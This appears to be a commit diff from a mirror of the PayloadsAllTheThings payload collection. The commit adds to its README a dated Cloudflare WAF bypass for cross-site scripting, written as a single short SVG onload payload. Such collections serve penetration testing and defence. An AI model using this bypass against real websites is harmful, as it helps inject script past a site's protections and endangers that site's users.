mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-12-12 15:49:38 -08:00
Update README.md
Added Cloudflare XSS bypass
This commit is contained in:
@@ -817,6 +817,12 @@ Works for CSP like `script-src self`
|
||||
|
||||
## Common WAF Bypass
|
||||
|
||||
### Cloudflare XSS Bypass - 22nd march 2019 (by @RakeshMane10)
|
||||
|
||||
```
|
||||
<svg/onload=alert()//
|
||||
```
|
||||
|
||||
### Cloudflare XSS Bypass - 27th february 2018
|
||||
|
||||
```html
|
||||
|
||||
Reference in New Issue
Block a user